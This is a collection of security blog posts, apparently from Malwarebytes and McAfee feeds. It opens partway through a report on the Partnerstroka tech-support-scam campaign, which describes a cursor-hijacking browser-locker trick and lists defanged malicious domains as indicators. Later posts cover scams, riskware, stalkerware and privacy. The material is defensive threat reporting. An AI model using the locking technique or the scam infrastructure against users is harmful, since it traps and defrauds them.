The threat actors use dozens of Gmail accounts following a somewhat predictable pattern.

Registrants emails tied to the Partnerstroka campaign

Each email address is tied to anywhere from a few to several hundred .club (gTLD) browlock domains abusing the GoDaddy registrar/hosting platform, with whom we have shared our investigation.

A view of the domains belonging to one email address

We were able to extract over 16,000 malicious domains during a period of several months, but we believe the actual number is much higher. Indeed, our visibility into the depth of this campaign was partly tied to the email addresses we had cataloged and unfortunately, the new privacy laws around whois records hindered our research.

Traffic distribution

We observed different techniques to redirect unsuspecting users to the browlock pages, although malvertising was almost always an element in the chain. The likelihood of getting redirected to one of these browlocks is higher when visiting websites that have less than optimal advertising practices.

BlackTDS

BlackTDS is a Traffic Distribution System (TDS) used by crooks to deliver web threats and avoid unwanted traffic (i.e. not real humans). The kind of traffic that comes out of it ranges from social engineering attacks to infections via exploit kits.

The Partnerstroka group used various ad networks to drive visitors to the browlock page, sometimes directly but often times via the intermediary of an .info gate.

BlackTDS traffic, malvertising, .info gate, and .club browlock

Decoy sites

Another technique the threat actors leveraged was redirects via decoy portals performing what we call “cloaking,” a trick used to only serve malicious content to certain kinds of users and redirect others (non targets) to a benign-looking page instead.

Traffic from decoy sites leading to .club browlock

Blogspot redirects

We also came across a number of blogs hosted on Blogger (now owned by Google). These were either empty or only showed limited content, and again, their purpose was to perform redirects to the browlock pages.

Rogue Blogspot pages used for redirects

Studying their redirection chain more closely, we found something interesting in how the browlock domain was being called. They used a marketing platform in between that would respond with the latest registered browlock domain:

Redirect from Blogspot to the browlock

Malvertising via injected sites

The majority of activity we are observing lately comes from websites that have been injected with ad code. While some website owners do this purposely to monetize their traffic, it becomes a lot more suspicious when we find matching ad campaign identifiers across domains that have seemingly nothing in common. Thanks to @baberpervez2 for providing recent malvertising chains.

Browser locker for Edge on Windows 10 from a malvertising chain

The evil cursor

There are many different documented techniques that can be used to prevent users from closing a tab or browser window, and often times those are specific to each browser. For instance, Edge and Firefox users will often get the authentication required prompt in a loop, while Chrome users are served with more nasty stuff, such as actual attempts to freeze the browser or trigger thousands of downloads.

In early September, we came across the Partnerstroka group again and noticed that they had incorporated a browser locker technique that was working against the latest version of Google Chrome (69.0.3497.81). Similar to other tricks, it effectively prevented from closing the offending page because the mouse cursor had been hijacked.

As can be seen in the animation above, the red dot represents what the user actually clicks on, even though the cursor itself seems to be way off. The code responsible for this unwanted behavior can be found within the HTML body tag:

A few lines of code to alter the mouse cursor

The Base64 blurb decodes to a simple image of a low-resolution mouse cursor, but the important bit is the 128×128 transparent pixel, which essentially turns your cursor into a large box. We reported this issue via the Chromium bug tracker portal, and the first person who replied showed what that custom “evil” cursor looks like:

The new cursor showing an actual (invisible) square

This is one example of many such tricks that can be used against modern browsers. Often times, features that are either well-documented or more obscure turn into attack vectors used to further fool end users, causing them to dial up the scammers for assistance. Indeed, the sound of an alert and a browser that appears to be completely locked up triggers panic for many people. These are essentially the same scare tactics that have been used for ages and still work well.

Similar campaigns

We have noted an increase in tech support scams abusing the NameCheap registrar. While we cannot positively identify that this is also the Partnerstroka group (landing page reuse among scammers is a thing), they definitely share some common traits.

Domain Name: ukxhdp[.]club
Registrar URL: http://www.namecheap.com
Creation Date: 2018-08-21T15:06:23Z

Browlock using the same cursor trick with a domain registered via Namecheap

Domain Name: descorservicesavailoffer[.]club
Registrar URL: http://www.namecheap.com
Creation Date: 2018-08-22T12:16:07Z

Browlock hosted on AWS S3 bucket

Mitigations

Due to the size and ever-changing nature of the infrastructure between different browser locker campaigns, applying a domain/IP database approach against them is not an effective solution. Although it does offer some coverage, scammers are always a step ahead because of their ability to register new (yet to be detected) domain names.

Here at Malwarebytes, we tackle this issue using both blacklist and, more importantly, heuristics techniques. Our browser extension (Beta) can detect and prevent browlocks:

Browlock stopped via the Malwarebytes extension

Tech support scams have been going on for some time and followed various trends over the years. While social engineering is their main leverage, they often incorporate techniques that help with that effort. We can expect crooks to keep coming up with clever ways to disrupt the browsing experience and abuse advertising, registration, and hosting platforms along the way.

As defenders, we must also face new challenges in tracking threat actors that benefit from changes brought up by privacy protection laws. As we adapt to these new realities, sharing threat intelligence with involved parties becomes more important than ever to tackle the problem at a larger scale.

Indicators of Compromise

Recent .info redirectors

getshopea7[.]info
meshopea4[.]info
bestshopec97[.]info

Recent .club browlocks

ourtabta133[.]club
xtabtec134[.]club
doebase1089[.]club
digivinta137[.]club
99shopez16[.]club

Decoy sites

allaboutsearching[.]com
bestcookingonline[.]com
best10traveltips[.]com
thronetheater[.]com
bestporngifs[.]org
bestshockers[.]com
toptipstotravel[.]com
hddfilms[.]com

Blogger redirects

part-added-to-a-book-document[.]blogspot.com
best-account-in-world.blogspot[.]com
thjdfk.blogspot[.]com
webanalysesteam.blogspot[.]com
latestdeliverystatusesofallyours[.]blogspot.com
speechwordstominutes.blogspot[.]com
templateanditwillalwaysservethe.blogspot[.]com
themeswritingpadandcustomise.blogspot[.]com

The post Partnerstroka: Large tech support scam operation features latest browser locker appeared first on Malwarebytes Labs.

British Airways hackers used same tools behind Ticketmaster breach

The British Airways web hack wasn't an isolated incident. Analysts at RiskIQ have reported that the breach was likely perpetrated by Magecart, the same criminal enterprise that infiltrated Ticketmaster UK. In both cases, the culprits used similar virtual card skimming JavaScript to swipe data from payment forms. For the British Airways attack, it was just a matter of customizing the scripts and targeting the company directly instead of going through compromised third-party customers.

Via: The Verge

Source: RiskIQ

Could the Photos You’re Sharing Online Be Putting Your Child at Risk?

sharing photos risksConfession time. I’m a mom that is part of the problem. The problem of posting photos of my kids online without asking for their permission and knowing deep down that I’m so excited about sharing, I’m not paying much attention at all to the risks.

Why do I do it? Because I’m madly in love with my two wee ones (who aren’t so wee anymore). Because I’m a proud parent who wants to celebrate their milestones in a way that feels meaningful in our digital world. And, if I’m honest, I think posting pictures of my kids publically helps fill up their love tank and remind them they are cherished and that they matter. . . even if the way I’m communicating happens to be very public.

Am I that different than most parents? According to a recent McAfee survey, I’m in the majority.

Theoretically, I represent one of the 1,000 interviewed for McAfee’s recent Age of Consent survey* that rendered some interesting results.

Can you relate?

  • 30% of parents post a photo of their child to social media daily.
  • 58% of parents do not ask for permission from their children before posting images of them on social media.
  • 22% think that their child is too young to provide permission; 19% claim that it’s their own choice, not their child’s choice.

The surprising part:

  • 71% of parents who share images of their kids online agree that the images could end up in the wrong hands.
  • Parents’ biggest concerns with sharing photos online include pedophilia (49%), stalking (48%), and kidnapping (45%).
  • Other risks of sharing photos online may also be other children seeing the image and engaging in cyberbullying (31%), their child feeling embarrassed (30%), and their child feeling worried or anxious (23%).

If this mere sampling of 1,000 parents (myself included) represents the sharing attitudes of even a fraction of the people who use Facebook (estimated to be one billion globally), then rethinking the way in which we share photos isn’t a bad idea.

We know that asking parents, grandparents, friends, and kids themselves to stop uploading photos altogether would be about as practical as asking the entire state of Texas to line up and do the hokey pokey. It’s not going to happen, nor does it have to.

But we can dilute the risks of photo sharing. Together, we can agree to post smarter, to pause a little longer. We can look out for one another’s privacy, and share in ways that keep us all safe.

Ways to help minimize photo sharing risks:

  • Pause before uploading. That photo of your child is awesome but have you stopped to analyze it? Ask yourself: Is there anything in this photo that could be used as an identifier? Have I inadvertently given away personal information such as a birthdate, a visible home addresses, a school uniform, financial details, or potential passwords? Is the photo I’m about to upload something I’d be okay with a stranger seeing? sharing photos risks
  • Review your privacy settings. It’s easy to forget that when we upload a photo, we lose complete control over who will see, modify, and share that photo again (anywhere they choose and in any way they choose). You can minimize the scope of your audience to only trusted friends and family by customizing your privacy settings within each social network.  Platforms like Facebook and Instagram have privacy settings that allow you to share posts (and account access) with select people. Use the controls available to boost your family privacy.
  • Voice your sharing preferences with others. While it may be awkward, it’s okay (even admirable) to request friends and family to reign in or refrain from posting photos of your children online. This rule also applies to other people’s public comments about your vacation plans, new house, children’s names or birthdates, or any other content that gives away too much data. Don’t hesitate to promptly delete those comments by others and explain yourself in a private message if necessary.
  • Turn off geotagging on photos. Did you know that the photo you upload has metadata assigned to it that can tell others your exact location? That’s right. Many social networks will tag a user’s location when that user uploads a photo. To make sure this doesn’t happen, simply turn off geotagging abilities on your phone. This precaution is particularly important when posting photos away from home.
  • Be mindful of identity theft. Identity theft is no joke. Photos can reveal a lot about your lifestyle, your habits, and they can unintentionally give away your data. Consider using an identity theft protection solution like McAfee Identity Theft Protection that can help protect your identity and safeguard your personal information.

* McAfee commissioned OnePoll to conduct a survey of 1,000 parents of children ages one month to 16 years old in the U.S.

The post Could the Photos You’re Sharing Online Be Putting Your Child at Risk? appeared first on McAfee Blogs.

Fortnite’s Google Play rebuff sparks security concerns for Android users

There’s been no small outbreak of chaos in mobile land recently, all because of an astonishingly popular game called Fortnite.

Here’s the thing: people refer to Android as “open platform,” saying that, in theory, you can do what you want with it. In practice, you buy an Android phone and then you’re locked into apps from the Google Play store. You can switch things off to allow external installs, but it’s generally not advisable, as it leaves the gate open to potentially dubious installs.

You can delve into discussions about whether Android is open source or not, but the conversation is a little more complicated and nuanced than simply answering “yes” or “no.”

With all of the above discord thrown into a melting pot and swirled around, Fortnite steps in and rattles a few more cages.

What happened?

The developers, Epic, decided that they’d rather offer the game on mobile outside of Google Play, which drastically increases the amount of revenue not nibbled at by Google. There are multiple potential issues with this:

  • Having children enable the “allow installs from unknown sources” option on an Android is a recipe for disaster. It not only means many of them will inevitably end up downloading a rogue app by mistake, it also means that those phones are now less secure than the fully locked-down Android devices out there.
  • As pointed out on Twitter, even children with legitimate installs of Fortnite onboard will eventually fall foul to something nasty because the phone is splashing around in the metaphorical malware mud.
  • Everything comes down to how well promoted the official download link is, and how efficiently the game developers tell people to only grab the game from that one specific link.
  • Epic needs to ensure they don’t fall victim to sophisticated SEO scams pointing links away from their site and toward bad downloads, and also that their site security is top notch. If the page is compromised, a rogue download link might be waiting in the wings.

That’s how the initial landscape looked shortly after Epic’s announcement, and many predicted things would quickly go horribly wrong.

Did things go horribly wrong?

They most certainly did. In the end, it wasn’t even a rogue app causing mayhem but an issue found with Fortnite’s installer that allowed for the possibility of rogue apps onboard to hijack the installer and install their own junkware. The so-called “Man in the Disk” attack looks for apps not locking down external storage as well as they should, and quickly gets to work exploiting things happening under the hood.

The uproar over the installer kerfuffle was rounded off with a bit of a fierce debate on Twitter, because that’s what happens with everything in life now.

What happens next?

Whether they like it or not, Epic are now the standard bearer for “app developer going off range into the (incredibly wealthy and insecure) wilderness.” I don’t believe an Android app has attracted quite this much attention before, and that’s without throwing the no Google Play install angle into the mix.

What they’re also stuck with is the realization that for as long as they continue to remain outside of the Google Play ecosystem, stories will come back to haunt them regarding malware installs masquerading as the real thing, social engineering tricks convincing children to download dodgy Fortnite add-ons from Russian servers, and potential SEO poisoning leading would-be gamers astray.

Google Play certainly isn’t perfect, and plenty of rogue apps have been found lurking there through the years. I think most security professionals would argue it’s still an awful lot riskier to switch off the unknown source install ban than it is to visit Play and grab an app, though.

Let’s also not single out Epic on this one; it’s not just game developers taking tentative steps into the world of unknown installs—even mobile phone providers do it. About four or five years ago, I replaced my phone and took out a package deal with a well-known UK retailer. Part of the deal was “six free games for your Android.” Sounds great, right? Except I quickly realized that to get the games, you had to enable unknown source installs and download the six .APK files directly from the phone provider’s website.

At no point did anyone say anything about how turning off a security feature of the phone I’d just been sold was a bad idea. Nothing in the literature provided mentioned anything beyond, “Wow, turning this off is a really good idea, free games! Wow!” This is also at a time when I was regularly writing about fake Angry Birds/Flappy Bird downloads hosted on Russian websites.

Once installed (via dragging and dropping from desktop to mobile through the magic of USB cables), those fake bird-themed games would typically try and perform premium rate SMS shenanigans. This only worked because some people were running around with unknown source installs permitted, and they’d still have to try and social engineer the ones that weren’t into turning it on.

Unknown installs: so hot right now

Now we’re at a point where unknown source installs are not only mainstream but currently attached to the wheels of an absolute gaming juggernaut. There are serious security issues that Epic needs to consider, and it’s going to be fascinating looking back in six to 12 months and deciding if promoting unknown source installs in this way caused a maelstrom of security headaches from all sides, or a large pile of “absolutely nothing much happened.”

If it’s the latter, you can bet more developers will want to take advantage of this method. Then the threat landscape will become significantly more complicated in mobile land.

The post Fortnite’s Google Play rebuff sparks security concerns for Android users appeared first on Malwarebytes Labs.

When spyware goes mainstream

Stealware.

Surveillanceware.

Stalkerware.

These are terms alternately used to effectively identify a file-based threat that has been around since 1996: spyware. More than two decades later, consumer or commercial spyware has gone mainstream, and the surprising number of software designed, openly marketed, and used for spying on people is proof of that.

Forget the government, nation-states, private agencies, and law enforcement. Normal, ordinary citizens can now wield powerful surveillance software and use it against any target they wish—all thanks to “legitimate” companies like mSpy, Retina-X, FlexiSpy, Family Orbit, TheTruthSpy, and others. While the spyware they market can be placed in the hands of employers who want to keep tabs on employees in the workplace, or in the hands of parents who want to look after their kids, it can also be placed in the hands of stalkers, abusive partners, or someone who just wants to get a leg up in the divorce proceedings.

Spyware: spotting the signs

Spyware is usually stealthy by nature—but that doesn’t mean its activities or the effects of its presence on a desktop machine, laptop, or mobile device aren’t unnoticed. Below is a rundown of common symptoms that may indicate your computing devices have spyware installed:

Desktop or laptop:

  • Computer or device sluggishness
  • Crashing (when it usually doesn’t)
  • Multiple, unexpected pop-ups
  • Changes in certain browser settings
  • Unusual redirections to sites you haven’t seen or visited
  • Difficulty logging in to secure websites
  • New browser toolbars, widgets, or apps
  • The appearance of random error messages
  • Certain browser hotkeys stop working

Mobile phone or tablet:

  • Battery runs out quicker than normal
  • The device feels warm even when not in use and not charging
  • Increased data usage/Internet activity
  • Clicking, static, echo-y, or distant voices can be heard when on a call
  • Takes a while to shut down
  • Unexplained phone charges, phone calls, and messages
  • Autocorrect features stop working correctly
  • Longer response time
  • For iPhones: Presence of the Cydia app (although there are products now that don’t require a jailbroken iPhone)
  • For iPhones: Request for Apple ID credentials

Read: IoT domestic abuse: What can we do to stop it?


Spying is caring?

While many of us wrinkle our noses in disgust at spyware, some well-intentioned individuals see the good in planting and using such software in the devices of their loved ones. As mentioned earlier, parents (for example) want to stay in touch with their kids who are out and about. Sometimes just knowing where they are when Mom or Dad checks up on them—of course, they aren’t going to pick up the phone—can help them go about their day a little easier.

If you are already considering or using commercial spyware to “keep an eye” on your kids, we suggest you ask yourself the following questions:

Will I be/Am I breaking any laws?

You are if the following qualifications are true:

The states of Iowa and Washington criminalize some forms of spyware.

Even spyware developers have the Software Principles Yielding Better Levels of Consumer Knowledge (or the SPY BLOCK Act), the Securely Protect Yourself Against Cyber Trespass (or the SPY ACT), and the Internet Spyware Prevention Act (or The I-SPY Act) to contend with.

Have I already looked for better alternatives?

Almost every “legitimate” spy software in the market wears the slogan “completely undetectable,” or a variant of it. As we always say, if it sounds too good to be true, it probably is. Not only is spyware often detectable (see symptoms above), it’s also intruding on privacy. Instead of installing spyware, look for alternative apps that can help you monitor your loved one’s locations without snooping on their other stuff like messages and calls. If you’re an iPhone user, take advantage of Find My Friends. For Android users, you can use Trusted Contacts.

Do I know how these companies treat my target’s information?

“Carelessly” is probably the first word that comes to mind. Just look at the number of breaches that have happened against spyware companies in the last 18 months. Not only that, hackers who claim to target these companies consistently state that the data they siphoned from spyware targets aren’t encrypted at all.

How would I feel if I were in their shoes?

Monitoring a loved one isn’t inherently wrong in and of itself, but doing so without their consent is, even if it’s well-intentioned. This is why it’s so essential for all individuals involved to ask for and give consent when it comes to installing monitoring apps on devices. This doesn’t just apply to the parent-child dynamic.

Of course, for parents of pre-teens, many feel and believe that consent is optional, so they exercise their tough love on the young ones for a little while longer for their own protection and safety. As long as monitoring doesn’t (and shouldn’t) replace a healthy communication between parent or carer and child, this is fine. Parents of teens, on the other hand, may have to reassess their monitoring practices. Perhaps it’s time they sit down with the kids and talk to them about it.

Spying on someone without them knowing sucks. And when they do find out, even if you mean well, the damage caused by the invasion of privacy and breach of trust could be rather hard to undo.

Whether you think it’s beneficial or not to use spyware doesn’t change the fact that it’s still classified as malware, and malware—regardless of the law—isn’t something that should typically be found installed on computing devices of average users.

Stay safe, everyone!

The post When spyware goes mainstream appeared first on Malwarebytes Labs.

Family Tech: How Safe is Your Child’s Personal Data at School?

Kids and Personal DataRight about now, most kids are thinking about their chemistry homework, the next pep rally, or chiming in on their group text. The last thing on their minds as they head back to school is cybersecurity. But, it’s the one thing — if ignored — that can wreck the excitement of a brand new school year.

You’ve done a great job, parent. You’ve equipped their phones, tablets, and laptops with security software. And, you’ve beefed up safeguards on devices throughout your home. These efforts go a long way in protecting your child’s (and family’s) privacy from prying eyes. Unfortunately, when your child walks out your front door and into his or her school, new risks await.

No one knows this season better than a cybercriminal. Crooks know there are loopholes in just about every school’s network and that kids can be easy targets online. These security gaps can open kids up to phishing scams, privacy breaches, malware attacks, and device theft.

The school security conversation

Be that parent. Inquire about your school’s security protocols.  The K-12 Cybersecurity Resource Center reports that 358 school breaches have taken place since January of 2016.  Other reports point to an increase in hackers targeting school staff with phishing emails and seeking student social security numbers to sell on the dark web.

A few questions to consider:Kids and Personal Data

  • Who has physical and remote access to your student’s digital records and what are the school’s protection practices and procedures?
  • How are staff members trained and are strong password protocols in place?
  • What security exists on school-issued devices? What apps/software is are being used and how will those apps collect and use student data?
  • What are the school’s data collection practices? Do data collection practices include encryption, secure data retention, and lawful data sharing policies?
  • What is the Bring Your Own Device (BYOD) policy?

The data debate

As K-12 administrators strive to maintain secure data collection practices for students, those same principles may be dubious as kids move on to college. As reported by Digiday, one retailer may be quietly disassembling privacy best practices with a bold “pay with data” business model. The Japanese coffee chain Shiru Café offers students and faculty members of Brown University free coffee in exchange for entering personal data into an online registry. Surprisingly, the café attracts some 800 customers a day and is planning on expanding its business model to more college campuses.

The family conversation

Keep devices close. Kids break, lose, lend, and leave their tech unattended and open to theft. Discuss responsible tech ownership with your kids. Stolen devices are privacy gold mines.

Never share passwords. Kids express their loyalty to one another in different ways. One way that’s proving popular but especially unsafe nowadays is password sharing. Remind kids: It’s never okay to share passwords to devices, social networks, or school platforms. Never. Password sharing opens up your child to a number of digital risks.

Safe clicking, browsing practices. Remind kids when browsing online to watch out for phishing emails, fake news stories, streaming media sites, and pop-ups offering free downloads. A bad link can infect a computer with a virus, malware, spyware, or ransomware. Safe browsing also includes checking for “https” in the URL of websites. If the website only loads with an “http,” the website may not be enforcing encryption.Kids and Personal Data

Be more of a mystery. Here is a concept your kids may or may not latch on to but challenge them to keep more of their everyday life a mystery by posting less. This includes turning off location services and trying to keep your whereabouts private when sharing online. This challenge may be fun for your child or downright impossible, but every step toward boosting privacy is progress!

Discuss the risk of public Wi-Fi. Kids are quick to jump on Wi-Fi wherever they go so they can use apps without depleting the family data plan. That habit poses a big problem. Public Wi-Fi is a magnet for hackers trying to get into your device and steal personal information. Make sure every network your child logs on to requires a password to connect. Go a step further and consider using a Virtual Private Network (VPN) for added security for your whole family.

Want to connect more to digital topics that affect your family? Stop by ProtectWhatMatters.online, and follow @McAfee_Family on Twitter. Also, join the digital security conversation on Facebook.

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her onTwitter @McAfee_Family. (Disclosures)

The post Family Tech: How Safe is Your Child’s Personal Data at School? appeared first on McAfee Blogs.

Official Cardi B website plagued by spammers

We come bearing tidings of proper website maintenance and general housekeeping for singer Cardi B (or rather, for her web development team). At first glance, it appeared as though her website had been hacked a few days ago. But a look under the hood told a different story.

We were surprised to see the following lurking on the official Cardi B website:

Cardi spam

Click to enlarge

Ignore the privacy policy pop-up. Websites can’t get enough of those these days, thanks to GDPR. No, what we’re talking about is the peculiar blast of messed up spam text all over the page. Had it been compromised? Or was something else to blame?

Click to enlarge

Things certainly didn’t look great. Even worse for the singer, the front page of her site was touting similar spammy vids:

Video spam

Click to enlarge

I could be wrong, but I don’t think her fans are particularly interested in clickthroughs to fake movie streams and a football match involving Stoke City and Wigan Athletic. The spam links also found their way onto the photos page:

photo spam

Click to enlarge

Those are definitely photos, but not so much of a singer singing. What happened here?

It seems the site allows people to sign up as registered users, then post comments. Somewhere along the line, this feature has attracted the ire of spammers who figured out a way to not only plaster individual pages with spam links, but also feed said spam onto various main sections of the site as a whole.

We’ve posted at length regarding the correct treatment of user-posted comments, and we’ve also taken a look at how things can go wrong with plugins and third-party tools. When it comes to our own site, we keep a sharp eye on spam, moderate comments, and close comments sections after a certain amount of time. With the amount of junk floating around the web, you can’t afford to be lax where keeping a tidy online presence is concerned.

While the rogue pages in question seem to have been taken down, simply searching for the Cardi B website in Google reveals the damage done to the site’s search results:

google results

Click to enlarge

Spammy results such as the above can take a long time to filter out of search engines, and it isn’t great to have things like that sitting at the top of the searches alongside legitimate results.

more spam

Click to enlarge

There’s been a cleanup since Cardi B fans started talking about it on social media. Though you can still access the login page for existing user accounts on the site, it looks as though new sign-ups have been disabled so the site admins can bring everything back under control.

registration

Click to enlarge

While a spam outbreak is never good, especially when it spills onto your home page, it appears the scammers had nothing but spam in mind—so no malware links were forthcoming. What was in evidence, however, was any number of cookie-cutter links to video streaming sites and YouTube clips.

movie stream site

Click to enlarge

With so many links spammed, and tedious work to be done to check each one individually, there’s no way to guarantee final destinations were entirely free from harm. If you think you might have ended up on something other than a YouTube video or movie sign-up page via any of these links, then it’s a good idea to run some anti-malware scans on your PC and ensure you’re clean.

As for Cardi B, hopefully the site admins will be able to keep a lid on the kind of spam outbreaks they’ve experienced over the last couple of days. Social features for users of your site are great, but those services need to be balanced with tight moderation and a limit on where said features can take you—even if it is Stoke City versus Wigan Athletic.

The post Official Cardi B website plagued by spammers appeared first on Malwarebytes Labs.

Mobile Menace Monday: FakeGift is the gift that keeps on frustrating

Last spring, we found yet another piece of riskware on Google Play we call Android/PUP.Riskware.FakeGift. Based on Hindi characters found in the code, we can assume it originates from India. With over 50,000 installs before being removed from Google Play, FakeGift apparently kept on giving—frustration to its users, that is.

Click to view slideshow.

Gift cash money

As the name implies, FakeGift offers just that—fake gifts. Admittedly, it does so in a kind of fun way.  Here’s how it works: Every day you are given 10 free “gifts.”  As shown below, after the opening splash screen, the home page displays a gift box.

Click to view slideshow.

Press the gift box and you’ll receive a “gift” in rupees. The amount of rupees gifted is random. The gifted amount is then added to a balance found in the upper right part of the screen.

After pressing the gift box 10 times, it will let you know you’re done for the day—even after closing and reopening.

Click to view slideshow.

You can also accumulate rupees by pressing “Share,” which redirects you to WhatsApp. Note that if you don’t have Whatsapp, it just gives an error message stating, “Whatsapp not installed on this device.”  Once in Whatsapp, simply pick a victim…er…friend to send a message. In Hindi, the message says:

सभी स्मार्टफोन यूजर ध्यान दे 📱📱📱ऑनलाइन पैसे 💰कमाने का एक बहुत ही सुनहरा अवसर हैं आपके पास, “इसे एक बार जरूर पढ़े”| 👇👇👇👇👇 🎁🎁🎁 गिफ्ट मनी में आपका स्वागत हैं🎁🎁🎁गिफ्ट मनी दे रहा हैं पैसे कमाने का एक सुनहरा मौका गिफ्ट खोले और पैसा कमाए | गिफ्ट मनी अप्प में आप रोजाना 400-500 रूपए आसानी से कमा सकते हो | महीने के 15000 से 20000 रूपए आपकी इनकम हो सकती हैं | दोस्तों आपको 1 दिन में 10 गिफ्ट मिलेंगे उन गिफ्ट को आपको खोलना हैं आपके लक के अनुसार गिफ्ट में कितने भी रूपए निकल सकते हैं और गिफ्ट मनी आपको फ्री में गिफ्ट नहीं दे रहा हैं आपको रोजाना अप्प में 10 मिनट का वर्क करना हैं उसी के पैसे आपको दे रहा हैं तो दोस्तों पैसे कमाने के इस अच्छे मोके को गवांये नहीं और अभी डाउनलोड करे और वर्क स्टार्ट कर दे| Download this link <hidden Google Play link>

Rough translation using Google Translate:

All Smartphone users pay attention 📱📱📱 Online money is a great opportunity to make money, “You must read it once.” 👇👇👇👇👇 में Welcome to Gift MoneyGift Money is giving you a golden opportunity to earn money, open gifts and earn money. You can easily earn 400-500 rupees per day in the Gift Money App. You can earn from 15,000 to 20000 rupees a month. Friends, you will get 10 gifts in 1 day, you have to open those gifts according to your luck, how many rupees can get in the gift and gift gift is not giving you a free gift. You have to work 10 minutes daily in the work of the money If you are giving it, then guys do not miss this good thing to earn money and download it now and start work. Download this link <hidden Google Play link>

Every WhatsApp message sent is an additional 10 rupees.

FakeGift, the gift that keeps on giving…absolutely nothing

After accumulating some rupees, you can then press “Payment” from the home screen to redeem.  As shown below, you have three payment options.

Picking PayPal, it pops up this message.

Translation: For Balance Transfer in Paypel First Time should be 5000 rupees. After that you can transfer the balance daily. Thank you.

Here’s where it gets shady. After you accumulate the required 5,000 rupees, you still can’t transfer the money. Angry Google Play reviews show the disappointment.

One review (very) roughly translates to, “The money has to be 5000 every time you are cutting money and not being added, this is a fake app. Friends, do not waste your time.”

The fun ends

Although fun at first, the realization that there’s no award at the end turns fun into frustration. For many, this comes only after sharing with multiple friends via WhatsApp. Using this method, the app was able to gain over 50,000 installs. Also, another variant was found using a different name, but playing the same game. It also received around 50,000 installs. The good news is the only damage done is wasted time and nothing worse. Stay safe out there!

The post Mobile Menace Monday: FakeGift is the gift that keeps on frustrating appeared first on Malwarebytes Labs.

Green card scams: preying on the desperate

Thanks to @nullcookies for providing leads.

Most online scams depend on two things for success: a broken or otherwise onerous process to deal with a legitimate entity, and a desperate target population. With immigration, there are many, many burdensome processes to navigate, and most applicants involved are at least somewhat desperate due to costs and lengthy time expenditures. The result is an environment ripe for green card scams.

Looks real, but came from a scam site

Officialgreencardlottery.org (which is, in fact, none of these things) is a great example of how borrowing the symbolism and language of legitimate authorities, combined with limited authentic communications from those authorities, can create an environment ripe for scamming.

The site is professionally designed, down to a fake logo that approximates the US State Department logo as closely as legally possible. There are multiple urgent calls to action, with red “Apply Today” buttons on most pages, and dire warnings of what can happen to you if your application is entered too late. But scrolling down to the bottom, we see the following:

Which reads:

USA Green Card Office is not affiliated with the U.S. Government or any government agency. You can enter the U.S. Diversity Visa Lottery for Free at www.state.gov in between their open registration dates which typically start in early October 2018. We are not a law firm, we do not provide legal advice, and are not a substitute for an attorney. This site provides a review and submission service that requires a fee.

So not only are they not affiliated with the US government, they’re not attorneys, and therefore probably know nothing about immigration law and cannot provide meaningful help with any green card issues.

Passive DNS on the site doesn’t reveal much, except additional sites usa-dvprogram[.]info, and us-dvprogram[.]info. Stepping backwards to the last IP resolution shows the following:

official-dvlottery.us, official-usagcl.org, officialusagcl.org, usagc-eligibility.online, usagclmessage1.online

After finding little of interest in the scam infrastructure, we decided to register as a prospective immigrant and see what services were on offer.

After paying $129 for the privilege of surrendering some personal information, we promptly got a “verification call” from a man with a South Asian accent. We asked repeatedly about the process, when our application would be forwarded to the relevant officials, and how to move forward. The operator responded with a hard sell to “upgrade” our application for multiple chances to win. (This is not how the real lottery works.)

At no time were we provided any information on the real process, nor did the operator disclose at all what his company would do for us. Based on our experience with the call, the provider does not offer any services whatsoever, but will gladly take both money and significant amounts of personal data. As a scam overall, we rate it as a B-.

A question that sometimes arises with these sorts of scams amongst defenders is often, “Who could possibly fall for that?” The answer is typically, “probably you.”  Let’s look at why.

Below is the real green card lottery site at https://www.dvlottery.state.gov:

Unlike the scam site, the real one provides essentially no information on what the lottery is or how to apply. Signifiers of authenticity are limited to a small logo on the top left. There is no guidance on how to get further information.

By contrast, the scam site provides the basics on what the lottery is, some brief application statistics, and has large, prominent branding all over the site. If you, a prospective applicant, were to be presented with both sites, which one would feel more authentic? Which one would you choose if you had limited financial resources and could only apply once?  Which would feel more accommodating if you had limited English skills?

What’s happening with this scam site and the U.S. Department of State site above is quite similar to what we see with legitimate tech support and tech support scammers. An official entity does a poor job communicating with its constituency, and that creates a vacuum that scammers are all too eager to fill. So while there are concrete steps that an end user can take to stay safe from this sort of thing (see here), large companies and government agencies shoulder a share of the blame as well.

Rather than dismissing the individual for falling for the scam, a more viable solution for security personnel is to collaborate across the company to make sure your corporate communications don’t leave room for scammers to exploit. Does your marketing newsletter look like a scam? Do your support staffers authenticate themselves upon request? Can they verify third parties that work with you? These are all solvable problems that can prevent at least a portion of users from being victimized.

The post Green card scams: preying on the desperate appeared first on Malwarebytes Labs.

College Bound? 7 Important Technology Habits for Students

You’ve loved, shaped, and equipped your child to succeed in college and move in day is finally here.  But there’s still one variable that can turn your child’s freshman year upside down, and that’s technology.

That’s right, that essential laptop and indispensable smartphone your child owns could also prove to be his or her biggest headache if not secured and used responsibly. College students can be targets of identity theft, malware, online scams, credit card fraud, property theft, and internet addiction.

The other part of this new equation? You, parent, are no longer in the picture. Your child is now 100% on his or her own. Equipping time is over. Weekly tech monitoring and family chats are in the rearview mirror. Will they succeed? Of course, they will. But one last parenting chat on safety sure can’t hurt. Here are a couple of reminders to share with your college-bound kids.

7  Technology Habits for Students

1. Minimize use of public computers. Campuses rely on shared computers. Because campus networks aren’t always secure, this can open you up to identity theft. If you have to log on to a public computer be it a cafe, library, or lab, be sure to change any passwords each time you return. If you are working with a study group, don’t share passwords. Public devices can be prone to hackers seeking to steal login credentials and credit card numbers. If you do use public devices, get in the habit of browsing in the privacy mode. Clear browser history, cookies, and quit all applications before logging off.

2. Beware when shopping online. Online shopping is often the easiest way for students to purchase essentials. Be sure to use a secure internet connection when hitting that “purchase” button. Reputable sites encrypt data during transactions by using SSL technologies. Look for the tiny padlock icon in the address bar or a URL that begins with “https” (the “s” stands for secure) instead of “http.” Examine the site and look for misspellings, inconsistencies. Go with your instincts if you think a website is bogus, don’t risk the purchase. Online credit card fraud is on the rise, so beware.

3. Guard your privacy. College is a tough place to learn that not all people are trustworthy — even those who appear to be friends. Sadly, many kids learn about online theft the hard way. Never share passwords, credit card numbers, or student ID numbers. Be aware of shoulder surfing which is when someone peers over your shoulder to see what’s on your computer screen. Avoid leaving computer screens open in dorm rooms or libraries where anyone can check your browsing history, use an open screen, or access financial information. Also, never lend your laptop or tablet to someone else since it houses personal information and make sure that all of your screens are password protected.

